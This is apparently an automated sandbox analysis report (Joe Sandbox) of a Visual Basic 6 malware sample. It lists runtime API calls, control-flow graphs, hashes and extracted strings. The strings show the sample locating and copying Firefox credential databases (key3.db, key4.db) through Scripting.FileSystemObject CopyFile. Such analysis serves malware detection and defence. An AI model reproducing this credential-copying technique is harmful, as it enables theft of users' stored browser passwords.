                                                            • Part of subcall function 0042DDC0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0042DE52
                                                            • Part of subcall function 0042DDC0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0042DE5B
                                                            • Part of subcall function 0042DDC0: __vbaLenBstr.MSVBVM60(?,00000002,?,?,?), ref: 0042DE79
                                                            • Part of subcall function 0042DDC0: #631.MSVBVM60(?,?,?,00000002,?,?,?), ref: 0042DE96
                                                            • Part of subcall function 0042DDC0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0042DEA1
                                                            • Part of subcall function 0042DDC0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0042DEA4
                                                            • Part of subcall function 0042DDC0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0042DEB0
                                                            • Part of subcall function 0042DDC0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0042DEB9
                                                            • Part of subcall function 0042DDC0: #608.MSVBVM60(00000002,?,?,?,00000002,?,?,?), ref: 0042DEDA
                                                            • Part of subcall function 0042DDC0: __vbaVarAdd.MSVBVM60(?,00000002,00000008,?,?,?,00000002,?,?,?), ref: 0042DEEC
                                                            • Part of subcall function 0042DDC0: __vbaStrVarMove.MSVBVM60(00000000,?,?,?,00000002,?,?,?), ref: 0042DEF3
                                                            • Part of subcall function 0042DDC0: __vbaStrMove.MSVBVM60(?,?,?,00000002,?,?,?), ref: 0042DEFE
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 0040CDA9
                                                            • Part of subcall function 0042CE60: __vbaChkstk.MSVBVM60(?,004030D6,?,?,?,?,00000000,004030D6), ref: 0042CE7E
                                                            • Part of subcall function 0042CE60: __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004030D6), ref: 0042CEAE
                                                            • Part of subcall function 0042CE60: __vbaStrCat.MSVBVM60(004055A8,00673F04,?,?,?,?,004030D6), ref: 0042CECD
                                                            • Part of subcall function 0042CE60: #645.MSVBVM60(00000008,00000000), ref: 0042CEE3
                                                            • Part of subcall function 0042CE60: __vbaVarMove.MSVBVM60 ref: 0042CEF9
                                                            • Part of subcall function 0042CE60: __vbaFreeVar.MSVBVM60 ref: 0042CF02
                                                            • Part of subcall function 0042CE60: __vbaVarTstGt.MSVBVM60(00008008,?), ref: 0042CF2E
                                                            • Part of subcall function 0042CE60: __vbaInStrVar.MSVBVM60(00000008,00000000,00000008,?,00000001), ref: 0042CF6E
                                                            • Part of subcall function 0042CE60: __vbaBoolVarNull.MSVBVM60(00000000), ref: 0042CF75
                                                            • Part of subcall function 0042CE60: __vbaFreeVar.MSVBVM60 ref: 0042CF85
                                                            • Part of subcall function 0042CE60: __vbaStrCat.MSVBVM60(004055A8,00673F04), ref: 0042CFAD
                                                            • Part of subcall function 0042CE60: __vbaVarCat.MSVBVM60(?,?,00000008), ref: 0042CFC9
                                                            • Part of subcall function 0042CE60: __vbaStrVarMove.MSVBVM60(00000000), ref: 0042CFD0
                                                            • Part of subcall function 0042CE60: __vbaStrMove.MSVBVM60 ref: 0042CFDB
                                                            • Part of subcall function 0042CE60: __vbaVarAdd.MSVBVM60(0000000A,?,00000008), ref: 0042D004
                                                          • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000,?,?), ref: 0040CDD2
                                                          • __vbaFreeVar.MSVBVM60(?,?,?,?,?,004030D6), ref: 0040CDDE
                                                          • __vbaStrCopy.MSVBVM60(?,?,?,?,?,004030D6), ref: 0040CDF3
                                                          • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,004030D6), ref: 0040CE07
                                                          • __vbaStrCopy.MSVBVM60(?,?,?,?,?,004030D6), ref: 0040CE15
                                                          • __vbaStrMove.MSVBVM60 ref: 0040CE34
                                                            • Part of subcall function 0042DDC0: __vbaFreeVarList.MSVBVM60(00000002,00000002,?,?,?,?,00000002,?,?,?), ref: 0042DF0A
                                                            • Part of subcall function 0042DDC0: __vbaStrCopy.MSVBVM60 ref: 0042DF29
                                                            • Part of subcall function 0042DDC0: __vbaFreeStr.MSVBVM60(0042DF6C), ref: 0042DF65
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 0040CE4C
                                                            • Part of subcall function 0042CE60: __vbaStrVarMove.MSVBVM60(00000000), ref: 0042D00B
                                                            • Part of subcall function 0042CE60: __vbaStrMove.MSVBVM60 ref: 0042D016
                                                            • Part of subcall function 0042CE60: __vbaStrCopy.MSVBVM60 ref: 0042D024
                                                            • Part of subcall function 0042CE60: __vbaFreeStrList.MSVBVM60(00000003,?,?,?,?,?,?), ref: 0042D049
                                                            • Part of subcall function 0042CE60: __vbaFreeVarList.MSVBVM60(00000003,?,?,?,?,?,?,004030D6), ref: 0042D060
                                                            • Part of subcall function 0042CE60: #645.MSVBVM60(0000000A,00000000), ref: 0042D084
                                                            • Part of subcall function 0042CE60: __vbaVarMove.MSVBVM60 ref: 0042D09A
                                                            • Part of subcall function 0042CE60: __vbaFreeVar.MSVBVM60 ref: 0042D0A3
                                                            • Part of subcall function 0042CE60: __vbaFreeVar.MSVBVM60(0042D101), ref: 0042D0FA
                                                          • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000,?,?), ref: 0040CE75
                                                          • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,004030D6), ref: 0040CE81
                                                          • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,004030D6), ref: 0040CE96
                                                          • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,004030D6), ref: 0040CEAA
                                                          • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,004030D6), ref: 0040CEB8
                                                          • __vbaStrMove.MSVBVM60 ref: 0040CED7
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 0040CEEF
                                                          • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000,?,?), ref: 0040CF18
                                                          • __vbaFreeVar.MSVBVM60 ref: 0040CF24
                                                          • __vbaStrCopy.MSVBVM60 ref: 0040CF39
                                                          • __vbaStrMove.MSVBVM60(?), ref: 0040CF4D
                                                          • __vbaStrCopy.MSVBVM60 ref: 0040CF5B
                                                          • __vbaStrMove.MSVBVM60 ref: 0040CF7A
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 0040CF92
                                                          • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000,?,?), ref: 0040CFBB
                                                          • __vbaFreeVar.MSVBVM60 ref: 0040CFC7
                                                          • __vbaStrCopy.MSVBVM60 ref: 0040CFDC
                                                          • __vbaStrMove.MSVBVM60(?), ref: 0040CFF0
                                                          • __vbaStrCopy.MSVBVM60 ref: 0040CFFE
                                                          • __vbaStrMove.MSVBVM60(?), ref: 0040D012
                                                          • __vbaStrCopy.MSVBVM60 ref: 0040D020
                                                          • __vbaStrMove.MSVBVM60 ref: 0040D03F
                                                          • #666.MSVBVM60(?,00000008,?,?), ref: 0040D064
                                                          • __vbaStrCopy.MSVBVM60 ref: 0040D086
                                                          • __vbaStrMove.MSVBVM60 ref: 0040D0A5
                                                          • #666.MSVBVM60(?,00000008,00000000,?), ref: 0040D0D3
                                                          • __vbaVarCat.MSVBVM60(?,00000008,?), ref: 0040D0E8
                                                          • __vbaVarCat.MSVBVM60(?,?,00000000), ref: 0040D0FD
                                                          • __vbaStrVarMove.MSVBVM60(00000000), ref: 0040D104
                                                          • __vbaStrMove.MSVBVM60 ref: 0040D10F
                                                          • __vbaFreeStrList.MSVBVM60(00000009,?,?,?,?,00000000,?,?,00000000,00000000,?,?), ref: 0040D14B
                                                          • __vbaFreeVarList.MSVBVM60(00000007,00000008,?,00000008,?,?,?,?), ref: 0040D17E
                                                          • __vbaStrCopy.MSVBVM60 ref: 0040D196
                                                          • __vbaStrMove.MSVBVM60(?), ref: 0040D1AA
                                                          • __vbaStrCopy.MSVBVM60 ref: 0040D1B8
                                                          • __vbaStrMove.MSVBVM60 ref: 0040D1D7
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 0040D1EF
                                                          • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000,00000008,?), ref: 0040D218
                                                          • __vbaFreeVar.MSVBVM60 ref: 0040D224
                                                          • __vbaStrCopy.MSVBVM60 ref: 0040D239
                                                          • __vbaStrMove.MSVBVM60(?), ref: 0040D24D
                                                          • __vbaStrCopy.MSVBVM60 ref: 0040D25B
                                                          • __vbaStrMove.MSVBVM60 ref: 0040D27A
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 0040D292
                                                          • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000,00000008,?), ref: 0040D2BB
                                                          • __vbaFreeVar.MSVBVM60 ref: 0040D2C7
                                                          • __vbaStrCopy.MSVBVM60 ref: 0040D2DC
                                                          • __vbaStrMove.MSVBVM60(?), ref: 0040D2F0
                                                          • __vbaStrCopy.MSVBVM60 ref: 0040D2FE
                                                          • __vbaStrMove.MSVBVM60 ref: 0040D31D
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 0040D335
                                                          • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000,00000008,?), ref: 0040D35E
                                                          • __vbaFreeVar.MSVBVM60 ref: 0040D36A
                                                          • __vbaStrCopy.MSVBVM60 ref: 0040D37F
                                                          • __vbaStrMove.MSVBVM60(?), ref: 0040D393
                                                          • __vbaStrCopy.MSVBVM60 ref: 0040D3A1
                                                          • __vbaStrMove.MSVBVM60 ref: 0040D3C0
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 0040D3D8
                                                          • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000,00000008,?), ref: 0040D401
                                                          • __vbaFreeVar.MSVBVM60 ref: 0040D40D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$Move$Free$Copy$List$Bstr$#516#631#645#666ChkstkError$#537#608#632BoolNull
                                                          • String ID: 0004083D222D1116$0F3313162A1E221F062206$11313B36163D11111A1B$1A2D06251C15230809000F0E$2124001F06$221B0C3A05152A30$270A2618041D351E$29073609033F1E$351520333D051C351A34123F29$3B2C33100C1130$C$DCkfICNeeuVDZ$MBRISsSbyuoqjWefuJNDccaatoSYiiTqdLJPpuLFyvnv$YpIJTmeQqsCvYsheQHZGgcXBtLRtCuPRz$ZYbKuIAfZGABKZsrrWeOuYJ$gjoUkezPmYZiUeOCSpjyIcGuCPCtzARw$qgMlzuMfFjvipKlYxNNzLIifDrLSvOGWlDcBZTEOTDL$qlAvrOpVvgNuRDODSmKeLFgIKPpgDHEYi$vjhYbjZmdRZBHfvQqGvzEsedtDPkrRQYO$wwHIhKTguiXEm$xvgYCIjKTvXwKZvOGENTBKktGKyOWJn
                                                          • API String ID: 1362582428-2783218559
                                                          • Opcode ID: 03ad8300bbc931f3e5bbc3b588e01116fe2f86b9a21fa74b57f8051877ca3065
                                                          • Instruction ID: 6b8bad3854a6ca5e0ffeccc7b4a47edcfcffc914371e1be11cf640ca11b9979d
                                                          • Opcode Fuzzy Hash: 03ad8300bbc931f3e5bbc3b588e01116fe2f86b9a21fa74b57f8051877ca3065
                                                          • Instruction Fuzzy Hash: D432CA76911109EBCB04DFE0DE94EDEB7B9FF48304F10856AE102B61A4EB746A49CF64

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 6193 420e20-420f0f __vbaChkstk __vbaOnError call 42f340 __vbaAryMove __vbaUbound __vbaI2I4 6197 420f15-420f87 __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy __vbaStrMove call 42ddc0 __vbaStrMove 6193->6197 6198 421619-4216c1 __vbaFreeVar __vbaAryDestruct * 3 __vbaFreeVar __vbaFreeStr 6193->6198 6204 420f89-420f90 6197->6204 6205 420fdc-420fe2 __vbaGenerateBoundsError 6197->6205 6204->6205 6207 420f92-420fb1 6204->6207 6206 420fe8-42102c __vbaStrMove __vbaStrCat 6205->6206 6208 421081-421087 __vbaGenerateBoundsError 6206->6208 6209 42102e-421035 6206->6209 6210 420fb3-420fbd 6207->6210 6211 420fbf-420fc5 __vbaGenerateBoundsError 6207->6211 6214 42108d-421167 __vbaStrCat #645 __vbaStrMove __vbaStrCmp #645 __vbaStrMove __vbaStrCmp __vbaFreeStrList __vbaFreeVarList 6208->6214 6209->6208 6213 421037-421056 6209->6213 6212 420fcb-420fda 6210->6212 6211->6212 6212->6206 6215 421064-42106a __vbaGenerateBoundsError 6213->6215 6216 421058-421062 6213->6216 6217 42148c-421614 __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy __vbaStrMove call 42ddc0 __vbaStrMove __vbaVarCat #645 __vbaStrMove __vbaStrCmp __vbaVarCat #645 __vbaStrMove __vbaStrCmp __vbaFreeStrList __vbaFreeVarList 6214->6217 6218 42116d-4211ab #716 __vbaVarZero 6214->6218 6220 421070-42107f 6215->6220 6216->6220 6221 421200-421206 __vbaGenerateBoundsError 6218->6221 6222 4211ad-4211b4 6218->6222 6220->6214 6224 42120c-421379 __vbaStrCat * 2 __vbaChkstk * 2 __vbaObjVar __vbaLateMemCall __vbaFreeVarList __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy __vbaStrMove call 42ddc0 __vbaStrMove __vbaStrCat __vbaStrMove 6221->6224 6222->6221 6225 4211b6-4211d5 6222->6225 6235 42137b-421382 6224->6235 6236 4213ce-4213d4 __vbaGenerateBoundsError 6224->6236 6228 4211e3-4211e9 __vbaGenerateBoundsError 6225->6228 6229 4211d7-4211e1 6225->6229 6232 4211ef-4211fe 6228->6232 6229->6232 6232->6224 6235->6236 6237 421384-4213a3 6235->6237 6238 4213da-421486 __vbaStrMove __vbaStrCat __vbaStrMove call 4239d0 __vbaFreeStrList __vbaStrCat #529 __vbaFreeVar 6236->6238 6239 4213b1-4213b7 __vbaGenerateBoundsError 6237->6239 6240 4213a5-4213af 6237->6240 6238->6217 6242 4213bd-4213cc 6239->6242 6240->6242 6242->6238
                                                          APIs
                                                          • __vbaChkstk.MSVBVM60(?,004030D6,?,?,?,00411F0F,?,?), ref: 00420E3E
                                                          • __vbaAryMove.MSVBVM60(?,?,?,0043D064,?,?,?,?,004030D6), ref: 00420EAA
                                                          • __vbaUbound.MSVBVM60(00000001,?,?,?,?,?,004030D6), ref: 00420EBD
                                                          • __vbaI2I4.MSVBVM60(?,?,?,?,004030D6), ref: 00420EC5
                                                          • __vbaStrCopy.MSVBVM60 ref: 00420F24
                                                            • Part of subcall function 0042ECB0: __vbaLenBstr.MSVBVM60(?), ref: 0042ECF6
                                                            • Part of subcall function 0042ECB0: #632.MSVBVM60(?,?,?,?), ref: 0042ED52
                                                            • Part of subcall function 0042ECB0: __vbaVarCat.MSVBVM60(?,?,00000008,?), ref: 0042ED68
                                                            • Part of subcall function 0042ECB0: __vbaI4ErrVar.MSVBVM60(00000000), ref: 0042ED6F
                                                            • Part of subcall function 0042ECB0: #537.MSVBVM60(00000000), ref: 0042ED76
                                                            • Part of subcall function 0042ECB0: __vbaStrMove.MSVBVM60(?,6D41E251,00402710,00000000), ref: 0042ED81
                                                            • Part of subcall function 0042ECB0: __vbaStrCat.MSVBVM60(00000000), ref: 0042ED84
                                                            • Part of subcall function 0042ECB0: __vbaStrMove.MSVBVM60(?,6D41E251,00402710,00000000), ref: 0042ED8B
                                                            • Part of subcall function 0042ECB0: __vbaFreeStr.MSVBVM60(?,6D41E251,00402710,00000000), ref: 0042ED90
                                                            • Part of subcall function 0042ECB0: __vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 0042EDA8
                                                          • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004030D6), ref: 00420E6E
                                                            • Part of subcall function 0042ECB0: __vbaChkstk.MSVBVM60(00000000,004030D6), ref: 0042F35E
                                                            • Part of subcall function 0042ECB0: __vbaOnError.MSVBVM60(000000FF,6D42D8B1,?,6D41A323,00000000,004030D6), ref: 0042F38E
                                                            • Part of subcall function 0042ECB0: #645.MSVBVM60(00004008,00000010), ref: 0042F3B5
                                                            • Part of subcall function 0042ECB0: __vbaStrMove.MSVBVM60 ref: 0042F3C0
                                                            • Part of subcall function 0042ECB0: __vbaStrCmp.MSVBVM60(00405638,?), ref: 0042F3E3
                                                            • Part of subcall function 0042ECB0: __vbaStrCmp.MSVBVM60(00407034,?), ref: 0042F401
                                                            • Part of subcall function 0042ECB0: __vbaStrCmp.MSVBVM60(0040B454,?), ref: 0042F417
                                                            • Part of subcall function 0042ECB0: __vbaStrCat.MSVBVM60(?,00000001), ref: 0042F43D
                                                            • Part of subcall function 0042ECB0: __vbaStrMove.MSVBVM60 ref: 0042F448
                                                            • Part of subcall function 0042ECB0: #579.MSVBVM60(00000000), ref: 0042F44F
                                                            • Part of subcall function 0042ECB0: __vbaFreeStr.MSVBVM60 ref: 0042F469
                                                            • Part of subcall function 0042ECB0: __vbaRedimPreserve.MSVBVM60(00000180,00000004,?,00000008,00000001,00000000,00000000), ref: 0042F498
                                                          • __vbaStrMove.MSVBVM60(?), ref: 00420F38
                                                          • __vbaStrCopy.MSVBVM60 ref: 00420F46
                                                          • __vbaStrMove.MSVBVM60 ref: 00420F65
                                                            • Part of subcall function 0042DDC0: __vbaLenBstr.MSVBVM60(?,6D42D8B1,00000001,6D41A323), ref: 0042DE03
                                                            • Part of subcall function 0042DDC0: #631.MSVBVM60(?,?,?), ref: 0042DE39
                                                            • Part of subcall function 0042DDC0: __vbaStrMove.MSVBVM60(?,?,?), ref: 0042DE44
                                                            • Part of subcall function 0042DDC0: #516.MSVBVM60(00000000,?,?,?), ref: 0042DE47
                                                            • Part of subcall function 0042DDC0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0042DE52
                                                            • Part of subcall function 0042DDC0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0042DE5B
                                                            • Part of subcall function 0042DDC0: __vbaLenBstr.MSVBVM60(?,00000002,?,?,?), ref: 0042DE79
                                                            • Part of subcall function 0042DDC0: #631.MSVBVM60(?,?,?,00000002,?,?,?), ref: 0042DE96
                                                            • Part of subcall function 0042DDC0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0042DEA1
                                                            • Part of subcall function 0042DDC0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0042DEA4
                                                            • Part of subcall function 0042DDC0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0042DEB0
                                                            • Part of subcall function 0042DDC0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0042DEB9
                                                            • Part of subcall function 0042DDC0: #608.MSVBVM60(00000002,?,?,?,00000002,?,?,?), ref: 0042DEDA
                                                            • Part of subcall function 0042DDC0: __vbaVarAdd.MSVBVM60(?,00000002,00000008,?,?,?,00000002,?,?,?), ref: 0042DEEC
                                                            • Part of subcall function 0042DDC0: __vbaStrVarMove.MSVBVM60(00000000,?,?,?,00000002,?,?,?), ref: 0042DEF3
                                                            • Part of subcall function 0042DDC0: __vbaStrMove.MSVBVM60(?,?,?,00000002,?,?,?), ref: 0042DEFE
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 00420F7D
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00420FBF
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00420FDC
                                                          • __vbaStrMove.MSVBVM60(00000000), ref: 00421011
                                                          • __vbaStrCat.MSVBVM60(00000000), ref: 00421018
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00421064
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00421081
                                                          • __vbaStrCat.MSVBVM60(\key4.db,00000000), ref: 004210A2
                                                          • #645.MSVBVM60(00000008,00000000), ref: 004210BE
                                                          • __vbaStrMove.MSVBVM60 ref: 004210C9
                                                          • __vbaStrCmp.MSVBVM60(00405638,00000000), ref: 004210D5
                                                          • #645.MSVBVM60(00000008,00000000), ref: 004210EE
                                                          • __vbaStrMove.MSVBVM60 ref: 004210F9
                                                          • __vbaStrCmp.MSVBVM60(00405638,00000000), ref: 00421105
                                                          • __vbaFreeStrList.MSVBVM60(00000008,?,?,?,?,?,?,00000000,00000000), ref: 0042113F
                                                          • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 00421155
                                                          • #716.MSVBVM60(?,Scripting.FileSystemObject,00000000), ref: 0042117F
                                                          • __vbaVarZero.MSVBVM60 ref: 0042118E
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 004211E3
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00421200
                                                          • __vbaStrCat.MSVBVM60(\key4.db,00000000), ref: 00421221
                                                          • __vbaStrCat.MSVBVM60(\keyDBPath.db,00673F04), ref: 0042123D
                                                          • __vbaChkstk.MSVBVM60 ref: 00421258
                                                          • __vbaChkstk.MSVBVM60 ref: 0042127B
                                                          • __vbaObjVar.MSVBVM60(?,CopyFile,00000002), ref: 004212B3
                                                          • __vbaLateMemCall.MSVBVM60(00000000), ref: 004212BA
                                                          • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 004212D0
                                                          • __vbaStrCopy.MSVBVM60 ref: 004212F9
                                                          • __vbaStrMove.MSVBVM60(?), ref: 0042130D
                                                          • __vbaStrCopy.MSVBVM60 ref: 0042131B
                                                          • __vbaStrMove.MSVBVM60 ref: 0042133A
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 00421352
                                                          • __vbaStrCat.MSVBVM60(\keyDBPath.db,00673F04), ref: 00421364
                                                          • __vbaStrMove.MSVBVM60 ref: 0042136F
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 004213B1
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 004213CE
                                                          • __vbaStrMove.MSVBVM60(00000000), ref: 00421403
                                                          • __vbaStrCat.MSVBVM60(00000000), ref: 0042140A
                                                          • __vbaStrMove.MSVBVM60 ref: 00421415
                                                          • __vbaFreeStrList.MSVBVM60(00000008,?,?,?,?,?,?,00000000,00000000,?,?,00000000), ref: 0042144E
                                                          • __vbaStrCat.MSVBVM60(\keyDBPath.db,00673F04), ref: 00421469
                                                          • #529.MSVBVM60(00000008), ref: 0042147D
                                                          • __vbaFreeVar.MSVBVM60 ref: 00421486
                                                          • __vbaStrCopy.MSVBVM60 ref: 0042149B
                                                          • __vbaStrMove.MSVBVM60(?), ref: 004214AF
                                                          • __vbaStrCopy.MSVBVM60 ref: 004214BD
                                                          • __vbaStrMove.MSVBVM60 ref: 004214DC
                                                            • Part of subcall function 0042DDC0: __vbaFreeVarList.MSVBVM60(00000002,00000002,?,?,?,?,00000002,?,?,?), ref: 0042DF0A
                                                            • Part of subcall function 0042DDC0: __vbaStrCopy.MSVBVM60 ref: 0042DF29
                                                            • Part of subcall function 0042DDC0: __vbaFreeStr.MSVBVM60(0042DF6C), ref: 0042DF65
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 004214F4
                                                          • __vbaVarCat.MSVBVM60(?,00000008,?,00000000), ref: 0042153F
                                                          • #645.MSVBVM60(00000000), ref: 00421546
                                                          • __vbaStrMove.MSVBVM60 ref: 00421551
                                                          • __vbaStrCmp.MSVBVM60(00405638,00000000), ref: 0042155D
                                                          • __vbaVarCat.MSVBVM60(?,00000008,?,00000000), ref: 00421581
                                                          • #645.MSVBVM60(00000000), ref: 00421588
                                                          • __vbaStrMove.MSVBVM60 ref: 00421593
                                                          • __vbaStrCmp.MSVBVM60(00405638,00000000), ref: 0042159F
                                                          • __vbaFreeStrList.MSVBVM60(00000007,?,?,?,?,?,00000000,?), ref: 004215E7
                                                          • __vbaFreeVarList.MSVBVM60(00000003,?,?,?), ref: 00421604
                                                          • __vbaFreeVar.MSVBVM60(004216C2), ref: 00421682
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 00421691
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0042169D
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 004216A9
                                                          • __vbaFreeVar.MSVBVM60 ref: 004216B2
                                                          • __vbaFreeStr.MSVBVM60 ref: 004216BB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$Move$Free$Error$BoundsGenerateList$Copy$#645$Chkstk$BstrDestruct$#516#631$#529#537#579#608#632#716CallLatePreserveRedimUboundZero
                                                          • String ID: 29033A0D0100345E0422172A$37380F1522091E257810143A0B1F2E$CopyFile$Scripting.FileSystemObject$\key3.db$\key4.db$\keyDBPath.db$bkKfrLfpVVceV$euoUjhnGpnQxDvQttwCcdwzCOgunCrxjN
                                                          • API String ID: 2306589352-2695434336
                                                          • Opcode ID: ce2dd66f753731c41b740c509cec5fc3a98635359d3c7b3eb54ed915e418490d
                                                          • Instruction ID: 148a07b3f33077ca753af487e9c8b8e8542d9f074098d1a966a3e0b7b1e41e4b
                                                          • Opcode Fuzzy Hash: ce2dd66f753731c41b740c509cec5fc3a98635359d3c7b3eb54ed915e418490d
                                                          • Instruction Fuzzy Hash: 7F320A75900218DFDB14CFA4DD88BDEB7B5FB48304F1082AAE50AB72A4DB745A85CF58

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 6244 420ee6-420ef4 6245 420efa-420f0f 6244->6245 6246 4216d8-4216df __vbaErrorOverflow 6244->6246 6248 420f15-420f87 __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy __vbaStrMove call 42ddc0 __vbaStrMove 6245->6248 6249 421619-4216c1 __vbaFreeVar __vbaAryDestruct * 3 __vbaFreeVar __vbaFreeStr 6245->6249 6255 420f89-420f90 6248->6255 6256 420fdc-420fe2 __vbaGenerateBoundsError 6248->6256 6255->6256 6258 420f92-420fb1 6255->6258 6257 420fe8-42102c __vbaStrMove __vbaStrCat 6256->6257 6259 421081-421087 __vbaGenerateBoundsError 6257->6259 6260 42102e-421035 6257->6260 6261 420fb3-420fbd 6258->6261 6262 420fbf-420fc5 __vbaGenerateBoundsError 6258->6262 6265 42108d-421167 __vbaStrCat #645 __vbaStrMove __vbaStrCmp #645 __vbaStrMove __vbaStrCmp __vbaFreeStrList __vbaFreeVarList 6259->6265 6260->6259 6264 421037-421056 6260->6264 6263 420fcb-420fda 6261->6263 6262->6263 6263->6257 6266 421064-42106a __vbaGenerateBoundsError 6264->6266 6267 421058-421062 6264->6267 6268 42148c-4214ea __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy __vbaStrMove call 42ddc0 6265->6268 6269 42116d-4211ab #716 __vbaVarZero 6265->6269 6271 421070-42107f 6266->6271 6267->6271 6281 4214ef-421614 __vbaStrMove __vbaVarCat #645 __vbaStrMove __vbaStrCmp __vbaVarCat #645 __vbaStrMove __vbaStrCmp __vbaFreeStrList __vbaFreeVarList 6268->6281 6272 421200-421206 __vbaGenerateBoundsError 6269->6272 6273 4211ad-4211b4 6269->6273 6271->6265 6275 42120c-421379 __vbaStrCat * 2 __vbaChkstk * 2 __vbaObjVar __vbaLateMemCall __vbaFreeVarList __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy __vbaStrMove call 42ddc0 __vbaStrMove __vbaStrCat __vbaStrMove 6272->6275 6273->6272 6276 4211b6-4211d5 6273->6276 6286 42137b-421382 6275->6286 6287 4213ce-4213d4 __vbaGenerateBoundsError 6275->6287 6279 4211e3-4211e9 __vbaGenerateBoundsError 6276->6279 6280 4211d7-4211e1 6276->6280 6283 4211ef-4211fe 6279->6283 6280->6283 6283->6275 6286->6287 6288 421384-4213a3 6286->6288 6289 4213da-421427 __vbaStrMove __vbaStrCat __vbaStrMove call 4239d0 6287->6289 6290 4213b1-4213b7 __vbaGenerateBoundsError 6288->6290 6291 4213a5-4213af 6288->6291 6294 42142c-421486 __vbaFreeStrList __vbaStrCat #529 __vbaFreeVar 6289->6294 6293 4213bd-4213cc 6290->6293 6291->6293 6293->6289 6294->6268
                                                          APIs
                                                          • __vbaStrCopy.MSVBVM60 ref: 00420F24
                                                            • Part of subcall function 0042ECB0: __vbaLenBstr.MSVBVM60(?), ref: 0042ECF6
                                                            • Part of subcall function 0042ECB0: #632.MSVBVM60(?,?,?,?), ref: 0042ED52
                                                            • Part of subcall function 0042ECB0: __vbaVarCat.MSVBVM60(?,?,00000008,?), ref: 0042ED68
                                                            • Part of subcall function 0042ECB0: __vbaI4ErrVar.MSVBVM60(00000000), ref: 0042ED6F
                                                            • Part of subcall function 0042ECB0: #537.MSVBVM60(00000000), ref: 0042ED76
